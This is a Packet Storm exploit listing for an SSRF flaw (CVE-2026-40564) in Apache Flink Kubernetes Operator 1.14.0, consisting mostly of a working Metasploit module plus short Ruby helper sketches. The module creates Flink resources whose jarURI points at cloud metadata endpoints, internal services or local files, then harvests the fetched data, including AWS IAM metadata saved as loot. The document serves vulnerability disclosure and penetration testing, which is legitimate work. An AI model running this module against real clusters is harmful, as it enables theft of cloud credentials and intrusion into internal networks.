PACKETSTORM 6.5 MEDIUM

Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery (PACKETSTORM:223516)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

This is a Metasploit auxiliary module that demonstrates a server-side request forgery vulnerability in Apache Flink Kubernetes Operator version 1.14.0...

Basic Information

ID PACKETSTORM:223516
Published Jun 16, 2026 at 00:00

Affected Product

Affected Versions
==================================================================================================================================
| # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://flink.apache.org/ |
==================================================================================================================================

[+] Summary : This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator
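
The request at the heart of the issue is an ordinary custom-resource create call whose `spec.job.jarURI` points at the URL the operator should fetch. The sketch below shows roughly what such a manifest looks like. `build_session_job` is a hypothetical helper written for illustration, not part of the module that follows; the field names mirror the ones the module sends, and a real cluster may require further fields that are not shown here.

```ruby
require 'json'

# Hypothetical helper (illustration only): builds a FlinkSessionJob manifest
# whose jarURI is chosen by the caller. Field names mirror the module's payload.
def build_session_job(name, namespace, jar_uri)
  {
    apiVersion: 'flink.apache.org/v1beta1',
    kind: 'FlinkSessionJob',
    metadata: { name: name, namespace: namespace },
    spec: {
      job: { jarURI: jar_uri, parallelism: 1, upgradeMode: 'stateless' }
    }
  }
end

# Example values only; the metadata address is the one quoted in SSRF_URL's help text.
manifest = build_session_job('ssrf-demo', 'default', 'http://169.254.169.254/latest/meta-data/')
puts JSON.pretty_generate(manifest)
```

The operator, not the client that submits the manifest, is the party that later dereferences `jarURI`, which is why the fetch originates from inside the operator pod.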

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)',
'Description' => %q{
A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache
Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of
2026-04-09). The operator does not validate the `spec.job.jarURI` field
on FlinkSessionJob or FlinkDeployment resources. Anyone who can create
these resources can set the jarURI to any URL, including internal services,
cloud metadata endpoints, or filesystem paths.

When the operator reconciles the resource, it fetches the URL from inside
its own pod, enabling attackers to:
- Read cloud instance metadata (AWS/GCE/Azure IAM credentials)
- Access internal cluster services
- Read local files via file:// scheme
- Scan internal ports

This module provides detection and exploitation capabilities for this
SSRF vulnerability.
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-40564'],
['URL', 'https://lists.apache.org/thread/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw'],
['URL', 'https://flink.apache.org/2026/05/28/flink-kubernetes-operator-ssrf-cve-2026-40564/']
],
'DisclosureDate' => '2026-05-28',
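'License' => MSF_LICENSE,
# The Kubernetes API server is normally served over TLS; 6443 is its conventional port.
'DefaultOptions' => {
'SSL' => true,
'RPORT' => 6443
},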
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base Kubernetes API path', '/']),
OptString.new('NAMESPACE', [false, 'Kubernetes namespace', 'default']),
OptString.new('OPERATOR_POD', [false, 'Operator pod name (auto-detected if not set)']),
OptString.new('SSRF_URL', [true, 'Target URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)']),
OptString.new('RESOURCE_NAME', [false, 'FlinkSessionJob resource name', 'ssrf-exploit']),
OptString.new('BEARER_TOKEN', [false, 'Kubernetes API bearer token']),
OptBool.new('USE_SESSION_CLUSTER', [true, 'Use FlinkSessionJob instead of FlinkDeployment', true]),
OptInt.new('TIMEOUT', [false, 'HTTP request timeout', 30]),
# run_host reads datastore['Cleanup']; without a registered option it is always nil
OptBool.new('Cleanup', [false, 'Delete the created Flink resource after the run', true])
])
end

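# send_request_cgi expects a request path in 'uri' (host, port and TLS come
# from RHOSTS/RPORT/SSL), so return only the TARGETURI base path.
def k8s_api_url
normalize_uri(target_uri.path).chomp('/')
end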

def k8s_headers
headers = { 'Content-Type' => 'application/json' }

if datastore['BEARER_TOKEN'] && !datastore['BEARER_TOKEN'].empty?
headers['Authorization'] = "Bearer #{datastore['BEARER_TOKEN']}"
end

headers
end
def get_operator_pod
namespace = datastore['NAMESPACE']
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods"

res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
pods = JSON.parse(res.body)
pods['items'].each do |pod|
if pod['metadata']['name'] =~ /flink-kubernetes-operator/
operator_pod = pod['metadata']['name']
print_good("Found operator pod: #{operator_pod}")
return operator_pod
end
end
rescue JSON::ParserError
print_error("Failed to parse pods response")
end
end
nil
end
def create_flink_session_job(resource_name, namespace, jar_uri)
print_status("Creating FlinkSessionJob resource: #{resource_name}")
session_job = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkSessionJob",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
},
flinkConfiguration: {},
jobManager: {},
taskManager: {}
}
}
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => session_job.to_json,
'ssl' => true
)
if res && res.code == 201
print_good("FlinkSessionJob created successfully")
return true
else
print_error("Failed to create FlinkSessionJob: HTTP #{res&.code}")
return false
end
end
def create_flink_deployment(resource_name, namespace, jar_uri)
print_status("Creating FlinkDeployment resource: #{resource_name}")
deployment = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkDeployment",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
flinkVersion: "v1_17",
flinkConfiguration: {},
jobManager: {},
taskManager: {},
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
}
}
}

url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinkdeployments"

res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => deployment.to_json,
'ssl' => true
)

if res && res.code == 201
print_good("FlinkDeployment created successfully")
return true
else
print_error("Failed to create FlinkDeployment: HTTP #{res&.code}")
return false
end
end

def get_resource_status(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
return JSON.parse(res.body)
rescue JSON::ParserError
return nil
end
end
nil
end
def get_operator_logs(pod_name, namespace)
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods/#{pod_name}/log"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
return res.body
end

nil
end
def check_ssrf_in_logs(logs, target_url)
if logs && logs.include?('HttpArtifactFetcher.fetch') && logs.include?(target_url)
print_good("SSRF confirmed in operator logs")
return true
end
false
end
def delete_resource(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"

res = send_request_cgi(
'method' => 'DELETE',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && [200, 202, 204].include?(res.code)
print_good("Resource deleted successfully")
return true
else
print_warning("Failed to delete resource: HTTP #{res&.code}")
return false
end
end
def extract_metadata_response(response_body)
if response_body && !response_body.empty?
print_good("SSRF response received:")
print_line(response_body[0..1000])

if response_body.include?('iam') || response_body.include?('security-credentials')
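print_good("Response mentions IAM credentials")
# Only the first alphanumeric token is captured, so this is a guess at the
# role name rather than a parsed value.
role_match = response_body.match(/([a-zA-Z0-9\-_]+)/)
if role_match
print_status("First token in response (possible IAM role): #{role_match[1]}")
end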
end
return true
end
false
end
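# The framework invokes cleanup with no arguments after the run, so the
# resource arguments must be optional and the parent hook must still run.
def cleanup(resource_name = nil, namespace = nil)
super()
return if resource_name.nil?

print_status("Cleaning up resources...")
delete_resource(resource_name, namespace)
end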
def check_permissions(namespace)
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"

# An empty object fails validation, but the API server evaluates
# authorization first, so the status code still shows whether "create" is allowed.
res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => {}.to_json,
'ssl' => true
)

case res&.code
when 401, 403
print_error("Insufficient permissions to create Flink resources (HTTP #{res.code})")
return false
when 201, 400, 422
print_good("Sufficient permissions to create Flink resources")
return true
end

print_warning("Could not determine permissions (HTTP #{res&.code})")
true
end

def run_host(ip)
print_status("CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF")
print_status("Target: #{peer}")
print_status("SSRF Target URL: #{datastore['SSRF_URL']}")

namespace = datastore['NAMESPACE']
resource_name = "#{datastore['RESOURCE_NAME']}-#{Rex::Text.rand_text_alpha_lower(6)}"

print_status("Checking Kubernetes API connectivity...")
version_url = "#{k8s_api_url}/version"

res = send_request_cgi(
'method' => 'GET',
'uri' => version_url,
'headers' => k8s_headers,
'ssl' => true
)

unless res && res.code == 200
print_error("Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.")
return
end

print_good("Connected to Kubernetes API")

unless check_permissions(namespace)
print_error("Insufficient permissions to exploit SSRF")
return
end

print_status("Creating malicious Flink resource...")

if datastore['USE_SESSION_CLUSTER']
success = create_flink_session_job(resource_name, namespace, datastore['SSRF_URL'])
else
success = create_flink_deployment(resource_name, namespace, datastore['SSRF_URL'])
end

unless success
print_error("Failed to create malicious resource")
return
end

print_status("Waiting for operator reconciliation (15 seconds)...")
Rex.sleep(15)

status = get_resource_status(resource_name, namespace)

if status && status['status']
print_status("Resource status: #{status['status'].to_json[0..200]}")

if status['status'].to_s.include?('Failed to fetch') ||
status['status'].to_s.include?('Connection refused') ||
status['status'].to_s.include?('connect timed out')
print_good("SSRF attempt confirmed - operator tried to fetch the URL")
end
end

operator_pod = datastore['OPERATOR_POD']
if operator_pod.nil? || operator_pod.empty?
operator_pod = get_operator_pod
end

if operator_pod
print_status("Fetching operator logs...")
logs = get_operator_logs(operator_pod, namespace)

if logs && logs.include?(datastore['SSRF_URL'])
print_good("SSRF CONFIRMED - operator fetched the URL!")

if logs =~ /GET.*?#{Regexp.escape(datastore['SSRF_URL'])}/
print_good("HTTP GET request to #{datastore['SSRF_URL']} found in logs")
end

if logs =~ /HttpArtifactFetcher\.fetch/
print_good("HttpArtifactFetcher call confirmed")
end
end
end

if datastore['SSRF_URL'].include?('169.254.169.254') || datastore['SSRF_URL'].include?('metadata')
print_status("Attempting to read AWS metadata response...")

metadata_url = datastore['SSRF_URL']
if !metadata_url.end_with?('/')
metadata_url = metadata_url + '/'
end

if datastore['USE_SESSION_CLUSTER']
create_flink_session_job("#{resource_name}-metadata", namespace, metadata_url)
else
create_flink_deployment("#{resource_name}-metadata", namespace, metadata_url)
end

Rex.sleep(10)

metadata_status = get_resource_status("#{resource_name}-metadata", namespace)

if metadata_status && metadata_status['status']
status_text = metadata_status['status'].to_s
if status_text.include?('iam') || status_text.include?('security-credentials')
print_good("Extracted metadata:")
print_line(status_text[0..500])

store_loot(
'flink.ssrf.metadata',
'text/plain',
ip,
status_text,
'aws_metadata.txt',
'AWS metadata captured via SSRF'
)
end
end

# delete_resource picks the resource type from USE_SESSION_CLUSTER itself
delete_resource("#{resource_name}-metadata", namespace)
end

report_vuln(
host: ip,
port: datastore['RPORT'],
name: name,
refs: references,
info: "Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) - resource created with jarURI #{datastore['SSRF_URL']}; confirm the fetch in the resource status or operator logs"
)
if datastore['Cleanup']
cleanup(resource_name, namespace)
else
print_status("Resource #{resource_name} left for manual inspection")
print_status("Clean up with: kubectl delete -n #{namespace} #{datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjob' : 'flinkdeployment'} #{resource_name}")
end

print_good("SSRF exploitation completed")
end
end
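
The module treats two signals as evidence that the operator attempted the fetch: a fetch-related error string in the resource status, or the target URL appearing in the operator logs. As a minimal sketch, those checks can be folded into one predicate and used to decide whether a finding should be recorded. `fetch_attempted?` and `FETCH_ERROR_MARKERS` are hypothetical names introduced here; the marker strings are the ones the module already searches for.

```ruby
# Hypothetical helper (illustration only). The marker strings are copied from
# the status checks in run_host.
FETCH_ERROR_MARKERS = ['Failed to fetch', 'Connection refused', 'connect timed out'].freeze

# Returns true when either the resource status or the operator log suggests
# that the operator tried to retrieve target_url.
def fetch_attempted?(status_text, log_text, target_url)
  status_hit = FETCH_ERROR_MARKERS.any? { |marker| status_text.to_s.include?(marker) }
  log_hit = log_text.to_s.include?(target_url)
  status_hit || log_hit
end

# A status that carries a fetch error counts as an attempt even without logs.
puts fetch_attempted?('Failed to fetch http://10.0.0.1/', nil, 'http://10.0.0.1/') # prints "true"
```

A predicate like this only shows that a request was attempted; it says nothing about whether any response content was returned to the caller.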

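The module description names several kinds of target an unvalidated `jarURI` can reach: local files, cloud metadata endpoints, and internal services. The sketch below classifies a URI into those categories to make the distinction concrete. It is an illustration under stated assumptions, not the vendor's fix: `classify_jar_uri` and `INTERNAL_RANGES` are hypothetical names, the address ranges are the common private and link-local IPv4 blocks, and hostnames are not resolved, so a name that points at an internal address is reported only as `:hostname`.

```ruby
require 'uri'
require 'ipaddr'

# Hypothetical list (illustration only): loopback, private and link-local IPv4 ranges.
INTERNAL_RANGES = %w[127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16]
                  .map { |cidr| IPAddr.new(cidr) }.freeze

# Classifies a jarURI by scheme and literal host address. Hostnames are not
# resolved, so DNS names that map to internal addresses are not detected.
def classify_jar_uri(jar_uri)
  uri = URI.parse(jar_uri)
  return :local_file if uri.scheme == 'file'
  return :unsupported unless %w[http https].include?(uri.scheme)
  return :invalid if uri.host.nil? || uri.host.empty?

  begin
    ip = IPAddr.new(uri.host)
  rescue IPAddr::InvalidAddressError
    return :hostname
  end

  return :cloud_metadata if ip == IPAddr.new('169.254.169.254')

  INTERNAL_RANGES.any? { |range| range.include?(ip) } ? :internal_address : :external_address
rescue URI::InvalidURIError
  :invalid
end

%w[file:///etc/hostname http://169.254.169.254/latest/meta-data/ http://10.0.0.5:8080/].each do |candidate|
  puts "#{candidate} => #{classify_jar_uri(candidate)}"
end
```
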
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
